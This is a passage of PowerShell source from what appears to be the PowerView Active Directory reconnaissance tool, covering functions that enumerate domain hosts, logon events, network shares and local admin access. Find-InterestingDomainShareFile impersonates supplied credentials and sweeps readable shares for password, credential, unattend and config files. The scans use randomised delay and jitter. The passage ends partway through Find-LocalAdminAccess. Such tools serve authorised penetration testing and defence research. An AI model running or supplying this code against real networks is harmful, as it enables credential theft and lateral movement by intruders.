if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
$TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
}
# build the set of computers to enumerate
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
# if not -ComputerName is passed, query the current (or target) domain for domain controllers
$DCSearcherArguments = @{
'LDAP' = $True
}
if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain"
$TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
}
if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) {
$TargetComputers = @(,$TargetComputers)
}
Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)"
Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers"
if ($TargetComputers.Length -eq 0) {
throw '[Find-DomainUserEvent] No hosts found to enumerate'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential)
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
$DomainUserEventArgs = @{
'ComputerName' = $TargetComputer
}
if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime }
if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime }
if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents }
if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential }
if ($Filter -or $TargetUsers) {
if ($TargetUsers) {
Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName}
}
else {
$Operator = 'or'
$Filter.Keys | ForEach-Object {
if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) {
if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) {
$Operator = 'and'
}
}
}
$Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')}
Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object {
if ($Operator -eq 'or') {
ForEach ($Key in $Keys) {
if ($_."$Key" -match $Filter[$Key]) {
$_
}
}
}
else {
# and all clauses
ForEach ($Key in $Keys) {
if ($_."$Key" -notmatch $Filter[$Key]) {
break
}
$_
}
}
}
}
}
else {
Get-DomainUserEvent @DomainUserEventArgs
}
}
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
$Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential
$Result
if ($Result -and $StopOnSuccess) {
Write-Verbose "[Find-DomainUserEvent] Target user found, returning early"
return
}
}
}
else {
Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'StartTime' = $StartTime
'EndTime' = $EndTime
'MaxEvents' = $MaxEvents
'TargetUsers' = $TargetUsers
'Filter' = $Filter
'Credential' = $Credential
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
}
function Find-DomainShare {
<#
.SYNOPSIS
Searches for computer shares on the domain. If -CheckShareAccess is passed,
then only shares the current user has read access to are returned.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and enumerates the available shares for each
machine with Get-NetShare. If -CheckShareAccess is passed, then
[IO.Directory]::GetFiles() is used to check if the current user has read
access to the given share. If -Credential is passed, then
Invoke-UserImpersonation is used to impersonate the specified user before
enumeration, reverting after with Invoke-RevertToSelf.
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER CheckShareAccess
Switch. Only display found shares that the local user has access to.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-DomainShare
Find all domain shares in the current domain.
.EXAMPLE
Find-DomainShare -CheckShareAccess
Find all domain shares in the current domain that the current user has
read access to.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-DomainShare -Domain testlab.local -Credential $Cred
Searches for domain shares in the testlab.local domain using the specified alternate credentials.
.OUTPUTS
PowerView.ShareInfo
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ShareInfo')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[Alias('Domain')]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Alias('CheckAccess')]
[Switch]
$CheckShareAccess,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
Write-Verbose '[Find-DomainShare] Querying computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-DomainShare] No hosts found to enumerate'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $CheckShareAccess, $TokenHandle)
if ($TokenHandle) {
# impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
$Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
# get the shares for this host and check what we find
$Shares = Get-NetShare -ComputerName $TargetComputer
ForEach ($Share in $Shares) {
$ShareName = $Share.Name
# $Remark = $Share.Remark
$Path = '\\'+$TargetComputer+'\'+$ShareName
if (($ShareName) -and ($ShareName.trim() -ne '')) {
# see if we want to check access to this share
if ($CheckShareAccess) {
# check if the user has access to this path
try {
$Null = [IO.Directory]::GetFiles($Path)
$Share
}
catch {
Write-Verbose "Error accessing share path $Path : $_"
}
}
else {
$Share
}
}
}
}
}
if ($TokenHandle) {
Invoke-RevertToSelf
}
}
$LogonToken = $Null
if ($PSBoundParameters['Credential']) {
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
$LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken
}
}
else {
Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'CheckShareAccess' = $CheckShareAccess
'TokenHandle' = $LogonToken
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Find-InterestingDomainShareFile {
<#
.SYNOPSIS
Searches for files matching specific criteria on readable shares
in the domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and enumerates the available shares for each
machine with Get-NetShare. It will then use Find-InterestingFile on each
readhable share, searching for files marching specific criteria. If -Credential
is passed, then Invoke-UserImpersonation is used to impersonate the specified
user before enumeration, reverting after with Invoke-RevertToSelf.
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER Include
Only return files/folders that match the specified array of strings,
i.e. @(*.doc*, *.xls*, *.ppt*)
.PARAMETER SharePath
Specifies one or more specific share paths to search, in the form \\COMPUTER\Share
.PARAMETER ExcludedShares
Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
.PARAMETER LastAccessTime
Only return files with a LastAccessTime greater than this date value.
.PARAMETER LastWriteTime
Only return files with a LastWriteTime greater than this date value.
.PARAMETER CreationTime
Only return files with a CreationTime greater than this date value.
.PARAMETER OfficeDocs
Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
.PARAMETER FreshEXEs
Switch. Find .EXEs accessed within the last 7 days.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-InterestingDomainShareFile
Finds 'interesting' files on the current domain.
.EXAMPLE
Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
Finds 'interesting' files on readable shares on the specified systems.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
Find-DomainShare -Domain testlab.local -Credential $Cred
Searches interesting files in the testlab.local domain using the specified alternate credentials.
.OUTPUTS
PowerView.FoundFile
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.FoundFile')]
[CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[Alias('SearchTerms', 'Terms')]
[String[]]
$Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
[ValidateNotNullOrEmpty()]
[ValidatePattern('\\\\')]
[Alias('Share')]
[String[]]
$SharePath,
[String[]]
$ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'),
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$LastAccessTime,
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$LastWriteTime,
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$CreationTime,
[Parameter(ParameterSetName = 'OfficeDocs')]
[Switch]
$OfficeDocs,
[Parameter(ParameterSetName = 'FreshEXEs')]
[Switch]
$FreshEXEs,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-InterestingDomainShareFile] No hosts found to enumerate'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle)
if ($TokenHandle) {
# impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
$Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
ForEach ($TargetComputer in $ComputerName) {
$SearchShares = @()
if ($TargetComputer.StartsWith('\\')) {
# if a share is passed as the server
$SearchShares += $TargetComputer
}
else {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
# get the shares for this host and display what we find
$Shares = Get-NetShare -ComputerName $TargetComputer
ForEach ($Share in $Shares) {
$ShareName = $Share.Name
$Path = '\\'+$TargetComputer+'\'+$ShareName
# make sure we get a real share name back
if (($ShareName) -and ($ShareName.Trim() -ne '')) {
# skip this share if it's in the exclude list
if ($ExcludedShares -NotContains $ShareName) {
# check if the user has access to this path
try {
$Null = [IO.Directory]::GetFiles($Path)
$SearchShares += $Path
}
catch {
Write-Verbose "[!] No access to $Path"
}
}
}
}
}
}
ForEach ($Share in $SearchShares) {
Write-Verbose "Searching share: $Share"
$SearchArgs = @{
'Path' = $Share
'Include' = $Include
}
if ($OfficeDocs) {
$SearchArgs['OfficeDocs'] = $OfficeDocs
}
if ($FreshEXEs) {
$SearchArgs['FreshEXEs'] = $FreshEXEs
}
if ($LastAccessTime) {
$SearchArgs['LastAccessTime'] = $LastAccessTime
}
if ($LastWriteTime) {
$SearchArgs['LastWriteTime'] = $LastWriteTime
}
if ($CreationTime) {
$SearchArgs['CreationTime'] = $CreationTime
}
if ($CheckWriteAccess) {
$SearchArgs['CheckWriteAccess'] = $CheckWriteAccess
}
Find-InterestingFile @SearchArgs
}
}
if ($TokenHandle) {
Invoke-RevertToSelf
}
}
$LogonToken = $Null
if ($PSBoundParameters['Credential']) {
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
$LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken
}
}
else {
Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'Include' = $Include
'ExcludedShares' = $ExcludedShares
'OfficeDocs' = $OfficeDocs
'ExcludeHidden' = $ExcludeHidden
'FreshEXEs' = $FreshEXEs
'CheckWriteAccess' = $CheckWriteAccess
'TokenHandle' = $LogonToken
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Find-LocalAdminAccess {
<#
.SYNOPSIS
Finds machines on the local domain where the current user has local administrator access.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and for each computer it checks if the current user
has local administrator access using Test-AdminAccess. If -Credential is passed,
then Invoke-UserImpersonation is used to impersonate the specified user
before enumeration, reverting after with Invoke-RevertToSelf.
Idea adapted from the local_admin_search_enum post module in Metasploit written by:
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER CheckShareAccess
Switch. Only display found shares that the local user has access to.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-LocalAdminAccess
Finds machines in the current domain the current user has admin access to.
.EXAMPLE
Find-LocalAdminAccess -Domain dev.testlab.local
Finds machines in the dev.testlab.local domain the current user has admin access to.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
Finds machines in the testlab.local domain that the user with the specified -Credential
has admin access to.
.OUTPUTS
String
Computer dnshostnames the current user has administrative access to.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([String])]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Switch]
$CheckShareAccess,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
